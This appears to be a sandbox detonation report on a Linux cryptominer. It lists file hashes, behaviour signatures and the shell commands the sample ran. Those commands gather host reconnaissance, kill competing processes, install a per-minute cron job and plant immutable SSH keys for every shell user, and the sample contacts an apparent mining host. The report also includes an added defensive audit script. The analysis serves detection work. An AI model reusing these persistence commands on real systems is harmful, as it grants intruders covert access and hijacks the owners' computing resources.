SHA512 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c

/sbin/lntpdate

MD5 3748e897538baafbc7b260b4d2fbc98f
SHA1 41d179e3cfc4c1820ea2c0fed0d50009564db79b
SHA256 ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7
SHA512 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea

/etc/init.d/ntpdate

MD5 bd99a962d94b5b4c32f8b7c8ca1f9ea9
SHA1 af33dc04d1f16e5ccceb2c0569b26e45bb65b32b
SHA256 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28
SHA512 fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

149s

Max time network

134s

Command Line

[/tmp/.update/.i686]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/.update/.i686 N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.6m5OSD /usr/bin/crontab N/A

Enumerates running processes

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/.update/.i686 N/A

Security Software Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/grep N/A
File opened for reading /proc/cpuinfo /usr/bin/grep N/A
File opened for reading /proc/cpuinfo /tmp/.update/.i686 N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/cpu/types /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/.update/.i686 N/A
File opened for reading /sys/bus/dax/devices/target_node /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/node/online /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/dax/target_node /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/.update/.i686 N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/.update/.i686 N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/.update/.i686 N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/.update/.i686 N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/dax/devices /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/.update/.i686 N/A

Process Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/ps N/A
N/A N/A /usr/bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/565/stat /usr/bin/ps N/A
File opened for reading /proc/787/cmdline /usr/bin/ps N/A
File opened for reading /proc/15/status /usr/bin/ps N/A
File opened for reading /proc/455/stat /usr/bin/ps N/A
File opened for reading /proc/85/status /usr/bin/ps N/A
File opened for reading /proc/89/stat /usr/bin/ps N/A
File opened for reading /proc/495/stat /usr/bin/ps N/A
File opened for reading /proc/444/stat /usr/bin/ps N/A
File opened for reading /proc/962/status /usr/bin/ps N/A
File opened for reading /proc/1342/status /usr/bin/ps N/A
File opened for reading /proc/87/status /usr/bin/ps N/A
File opened for reading /proc/175/stat /usr/bin/ps N/A
File opened for reading /proc/3/stat /usr/bin/ps N/A
File opened for reading /proc/1349/status /usr/bin/ps N/A
File opened for reading /proc/443/cmdline /usr/bin/ps N/A
File opened for reading /proc/20/cmdline /usr/bin/ps N/A
File opened for reading /proc/558/stat /usr/bin/ps N/A
File opened for reading /proc/1349/cmdline /usr/bin/ps N/A
File opened for reading /proc/3/stat /usr/bin/ps N/A
File opened for reading /proc/1328/cmdline /usr/bin/ps N/A
File opened for reading /proc/79/status /usr/bin/ps N/A
File opened for reading /proc/169/status /usr/bin/ps N/A
File opened for reading /proc/1068/status /usr/bin/ps N/A
File opened for reading /proc/87/status /usr/bin/ps N/A
File opened for reading /proc/23/stat /usr/bin/ps N/A
File opened for reading /proc/91/cmdline /usr/bin/ps N/A
File opened for reading /proc/1068/stat /usr/bin/ps N/A
File opened for reading /proc/1333/stat /usr/bin/ps N/A
File opened for reading /proc/164/status /usr/bin/ps N/A
File opened for reading /proc/457/status /usr/bin/ps N/A
File opened for reading /proc/1039/status /usr/bin/ps N/A
File opened for reading /proc/1397/stat /usr/bin/ps N/A
File opened for reading /proc/7/status /usr/bin/ps N/A
File opened for reading /proc/1398/stat /usr/bin/ps N/A
File opened for reading /proc/868/stat /usr/bin/ps N/A
File opened for reading /proc/500/status /usr/bin/ps N/A
File opened for reading /proc/558/stat /usr/bin/ps N/A
File opened for reading /proc/1138/status /usr/bin/ps N/A
File opened for reading /proc/169/stat /usr/bin/ps N/A
File opened for reading /proc/693/status /usr/bin/ps N/A
File opened for reading /proc/876/status /usr/bin/ps N/A
File opened for reading /proc/91/stat /usr/bin/ps N/A
File opened for reading /proc/1097/stat /usr/bin/ps N/A
File opened for reading /proc/90/cmdline /usr/bin/ps N/A
File opened for reading /proc/813/stat /usr/bin/ps N/A
File opened for reading /proc/159/cmdline /usr/bin/ps N/A
File opened for reading /proc/1465/cmdline /usr/bin/ps N/A
File opened for reading /proc/159/stat /usr/bin/ps N/A
File opened for reading /proc/444/stat /usr/bin/ps N/A
File opened for reading /proc/962/cmdline /usr/bin/ps N/A
File opened for reading /proc/159/stat /usr/bin/ps N/A
File opened for reading /proc/676/status /usr/bin/ps N/A
File opened for reading /proc/20/stat /usr/bin/ps N/A
File opened for reading /proc/86/status /usr/bin/ps N/A
File opened for reading /proc/681/status /usr/bin/ps N/A
File opened for reading /proc/171/stat /usr/bin/ps N/A
File opened for reading /proc/272/status /usr/bin/ps N/A
File opened for reading /proc/77/cmdline /usr/bin/ps N/A
File opened for reading /proc/693/cmdline /usr/bin/ps N/A
File opened for reading /proc/1162/status /usr/bin/ps N/A
File opened for reading /proc/22/stat /usr/bin/ps N/A
File opened for reading /proc/1366/status /usr/bin/ps N/A
File opened for reading /proc/1097/cmdline /usr/bin/ps N/A
File opened for reading /proc/1336/cmdline /usr/bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/.cron /bin/sh N/A
File opened for modification /tmp/.lock /tmp/.update/.i686 N/A

Processes

/tmp/.update/.i686

[/tmp/.update/.i686]

/bin/sh

[sh -c echo "[$(hostname=$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo $hostname | awk {'print $1'} 2>/dev/null)$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print "-"$2'} 2>/dev/null)][$(whoami 2>/dev/null)][$(hostname 2>/dev/null)][$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][$(X=$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/$//' 2>/dev/null); if [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ $(echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'AMD' ]; then echo $X 2>/dev/null | awk {'print $2" "$3" "$4'} 2>/dev/null; else echo $X 2>/dev/null; fi)]"]

/usr/bin/hostname

[hostname -I]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print "-"$2}]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep Port ]

/usr/bin/cat

[cat /etc/ssh/sshd_config]

/usr/bin/whoami

[whoami]

/usr/bin/hostname

[hostname]

/usr/bin/grep

[grep -c ^processor /proc/cpuinfo]

/usr/bin/sed

[sed -e s/$//]

/usr/bin/sed

[sed -e s/^ *//]

/usr/bin/cut

[cut -d: -f2]

/usr/bin/grep

[grep -m 1 model name /proc/cpuinfo]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $4}]

/usr/bin/awk

[awk {print $4}]

/bin/sh

[sh -c ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[$2]++ {print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]

/usr/bin/awk

[awk /[zZ]/ && !a[$2]++ {print $2}]

/usr/bin/ps

[ps -A -ostat,ppid]

/usr/bin/id

[id -u]

/usr/bin/grep

[grep -v grep]

/usr/bin/grep

[grep /etc/cron]

/usr/bin/ps

[ps x]

/bin/sh

[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]

/usr/bin/id

[id -u]

/usr/bin/awk

[awk {if($3>30.0) print $2}]

/usr/bin/grep

[grep -v /usr/sbin/httpd]

/usr/bin/grep

[grep -v -- -bash[[:space:]]*$]

/usr/bin/grep

[grep -v grep]

/usr/bin/ps

[ps aux]

/bin/sh

[sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.i686' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'/tmp/.update/.i686' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.i686$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null]

/usr/bin/rm

[rm -rf /tmp/.update/.cron]

/usr/bin/grep

[grep -v grep]

/usr/bin/crontab

[crontab -l]

/usr/bin/grep

[grep -v /tmp/.update/.i686]

/usr/bin/grep

[grep /tmp/.update/.i686$]

/usr/bin/grep

[grep -v grep]

/usr/bin/uniq

[uniq]

/usr/bin/crontab

[crontab -l]

/usr/bin/wc

[wc -l]

/usr/bin/sort

[sort]

/usr/bin/crontab

[crontab /tmp/.update/.cron]

/usr/bin/rm

[rm -rf /tmp/.update/.cron]

/bin/sh

[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi]

/usr/bin/id

[id -u]

/usr/bin/wc

[wc -l]

/usr/bin/awk

[awk {if($3>30.0) print $2}]

/usr/bin/grep

[grep -- -bash[[:space:]]*$]

/usr/bin/grep

[grep -v grep]

/usr/bin/ps

[ps aux]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 1.1.1.1:53 xmr-rx0.pwndns.pw udp
US 1.1.1.1:53 xmr-rx0.pwndns.pw udp
FR 51.210.15.231:80 xmr-rx0.pwndns.pw tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp

Files

/tmp/.update/.cron

MD5 9814e9c19a7304358742e3553bd73ea7
SHA1 88d43c112af907d972b1f1e2f49632f8ca004864
SHA256 9941b828f1984f2a85ba06f5eca0d7c22c9519cb8f09b43bf9930f6174f01b6d
SHA512 eb8ff6cd01f8100b78b579d732ec264976bc3378130b1535bea4553a8347cf445c5654adc58fea55341d9c22ad29872d5d9f85fd8bc6291bc449359ec4e34d9f

/var/spool/cron/crontabs/tmp.6m5OSD

MD5 964b07829b4f71b67d83a0ac24db1cab
SHA1 bf052205fa7870a5b2ebb4141a4bb604ccecf435
SHA256 af81703b357640390737fb2e4df7d99dfc26935fd0d454b53440a70c7b70333b
SHA512 d44502a0c0908f5aeb8f5899fe7c26232e2563d1ba72a26bf32d5973513afcd5c5af321b047d62d1d36c393385a7d285d59b91869535cf9c350075408d6aea1b

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240611-en

Max time kernel

2s

Command Line

[/tmp/.update/auth]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/.update/auth N/A
File opened for modification /home/user/.ssh/authorized_keys /tmp/.update/auth N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/authusers /tmp/.update/auth N/A

Processes

/tmp/.update/auth

[/tmp/.update/auth]

/bin/uname

[uname -n]

/bin/mkdir

[mkdir /root/.ssh]

/bin/chmod

[chmod 0700 /root/.ssh]

/bin/chmod

[chmod 0644 /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ai /root/.ssh /root/.ssh/authorized_keys]

/bin/rm

[rm -rf authusers]

/bin/grep

[grep -e /bin/sh -e /bin/bash]

/bin/cat

[cat /etc/passwd]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/usr/bin/chattr

[chattr -ai /root/.ssh /root/.ssh/authorized_keys]

/bin/sed

[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/bin/mkdir

[mkdir /home/user/.ssh]

/bin/chown

[chown -R user /home/user/.ssh]
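
The process list above is the whole persistence routine in order: create `/root/.ssh` at mode 0700, write `authorized_keys` at 0644, pin both with `chattr +ai` (append-only plus immutable, so `rm`, `sed -i` and editors fail even as root until the attributes are cleared), then walk every `/etc/passwd` account whose shell is `/bin/sh` or `/bin/bash` (`grep -e /bin/sh -e /bin/bash | cut -d : -f 1` and `-f 6`), and for each one run `chattr -ai` and `sed -i /r78x7ECphuPrGrR4SDqE1w/d` on its `authorized_keys` before re-adding the key and creating `~/.ssh` where it is missing. The `sed` pattern is therefore a fragment of the key blob the sample installs; the report does not include the key itself. The audit below is an added example written for this report, not code from the sample or from the sandbox: it enumerates the same account population, reports any `authorized_keys` containing that fragment, and, where `lsattr` is present, reports the `i`/`a` attributes on the file and its directory. The passwd entries and key lines it runs against are constructed, and the blob carrying the marker is fabricated for the demonstration.

```shell
#!/bin/sh
# Added example: audit authorized_keys for the behavioral31 SSH-key persistence.

# Fragment the sample deletes with `sed -i /.../d` before re-adding its key (from the report).
KEY_MARKER='r78x7ECphuPrGrR4SDqE1w'

# shell_users PASSWD: print "user:home" for accounts with an sh or bash login shell, the
# population the sample iterates over (anchored to the shell field here).
shell_users() {
  grep -e '/bin/sh$' -e '/bin/bash$' "$1" | cut -d : -f 1,6
}

# immutable_flags PATH: print the i/a attribute letters lsattr reports, or nothing.
immutable_flags() {
  command -v lsattr >/dev/null 2>&1 || return 0
  lsattr -d "$1" 2>/dev/null | awk '{ print $1 }' | tr -cd 'ia'
}

# audit_keys_file PATH: print one "finding<TAB>path" line per issue in an authorized_keys file.
audit_keys_file() {
  f=$1
  [ -f "$f" ] || return 0
  if grep -q -- "$KEY_MARKER" "$f"; then
    printf 'marker-hit\t%s\n' "$f"
  fi
  # chattr +ai on the file or on the .ssh directory is rarely set by administrators.
  for p in "$f" "$(dirname "$f")"; do
    flags=$(immutable_flags "$p")
    [ -n "$flags" ] && printf 'chattr-%s\t%s\n' "$flags" "$p"
  done
  # Fingerprint of every parsable key, for manual review (skipped when ssh-keygen is absent).
  if command -v ssh-keygen >/dev/null 2>&1; then
    ssh-keygen -lf "$f" 2>/dev/null | while IFS= read -r line; do
      printf 'key\t%s: %s\n' "$f" "$line"
    done
  fi
}

# audit_all PASSWD [ROOT]: audit every sh/bash account's ~/.ssh/authorized_keys.
# ROOT prefixes the home directories so the demo can run on a constructed tree.
audit_all() {
  root=${2:-}
  shell_users "$1" | while IFS=: read -r user home; do
    audit_keys_file "$root$home/.ssh/authorized_keys"
  done
}

# Constructed demo tree (not taken from the report): root and "user" with shell logins,
# "daemon" with nologin, and a fabricated key line that contains the marker.
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/root/.ssh" "$DEMO/home/user/.ssh"
printf '%s\n' \
  'root:x:0:0:root:/root:/bin/bash' \
  'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
  'user:x:1000:1000:user:/home/user:/bin/sh' > "$DEMO/passwd"
printf '%s\n' 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFabricatedAdminKeyBlob admin@example' \
  > "$DEMO/root/.ssh/authorized_keys"
printf '%s\n' \
  'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFabricatedAdminKeyBlob admin@example' \
  "ssh-rsa AAAAB3NzaC1yc2E${KEY_MARKER}FabricatedBlob== fake" \
  > "$DEMO/home/user/.ssh/authorized_keys"

# Prints a marker-hit line for /home/user only; run `audit_all /etc/passwd` as root on a live host.
audit_all "$DEMO/passwd" "$DEMO"
```

On a live host the `chattr-` findings matter as much as the marker: an `authorized_keys` that cannot be edited by root is the residue of the `chattr +ai` step even after the key line itself has been changed, and it has to be cleared with `chattr -ai` before the file can be cleaned.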

Network

N/A

Files

/root/.ssh/authorized_keys

MD5 5841342e6d1bcae6dcfea6cc9326a684
SHA1 fea6d85939bb87ee27c30f670087ff0db740751c
SHA256 fb7dc97bdf7c5f4a74b2a0aa602a13c06ecadf99aeb1206dc86da38a7a75c6af
SHA512 116d63c20881320d0d76ab99300dbcf9146cf890d8b6c6c3769bc62cfbff88aba8d1d6d7ca0e39507a769251335251495e1246487fe8173f454e619535aadb33

/tmp/.update/authusers

MD5 9514cd886e4faf1f23baadfd967abcbd
SHA1 00894ed21cee494a192e94a782ae265e45d828f1
SHA256 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432
SHA512 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6

/tmp/.update/authusers

MD5 fe065880cc6e0333e8679d0e03ff2369
SHA1 aaceb9f893c93f47ddccca1e2e502c01ecbc5456
SHA256 f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77
SHA512 ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsel-20240611-en

Max time kernel

2s

Command Line

[/tmp/.systemd/.run]

Signatures

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/79/status /bin/ps N/A
File opened for reading /proc/sys/kernel/osrelease /bin/ps N/A
File opened for reading /proc/317/cmdline /bin/ps N/A
File opened for reading /proc/167/stat /bin/ps N/A
File opened for reading /proc/729/cmdline /bin/ps N/A
File opened for reading /proc/732/stat /bin/ps N/A
File opened for reading /proc/9/status /bin/ps N/A
File opened for reading /proc/150/cmdline /bin/ps N/A
File opened for reading /proc/24/cmdline /bin/ps N/A
File opened for reading /proc/722/stat /bin/ps N/A
File opened for reading /proc/2/cmdline /bin/ps N/A
File opened for reading /proc/24/stat /bin/ps N/A
File opened for reading /proc/15/cmdline /bin/ps N/A
File opened for reading /proc/22/stat /bin/ps N/A
File opened for reading /proc/82/status /bin/ps N/A
File opened for reading /proc/345/stat /bin/ps N/A
File opened for reading /proc/9/cmdline /bin/ps N/A
File opened for reading /proc/13/status /bin/ps N/A
File opened for reading /proc/376/cmdline /bin/ps N/A
File opened for reading /proc/14/cmdline /bin/ps N/A
File opened for reading /proc/79/status /bin/ps N/A
File opened for reading /proc/732/cmdline /bin/ps N/A
File opened for reading /proc/318/status /bin/ps N/A
File opened for reading /proc/66/status /bin/ps N/A
File opened for reading /proc/368/stat /bin/ps N/A
File opened for reading /proc/105/cmdline /bin/ps N/A
File opened for reading /proc/70/status /bin/ps N/A
File opened for reading /proc/230/stat /bin/ps N/A
File opened for reading /proc/727/cmdline /bin/ps N/A
File opened for reading /proc/14/status /bin/ps N/A
File opened for reading /proc/19/status /bin/ps N/A
File opened for reading /proc/68/status /bin/ps N/A
File opened for reading /proc/9/cmdline /bin/ps N/A
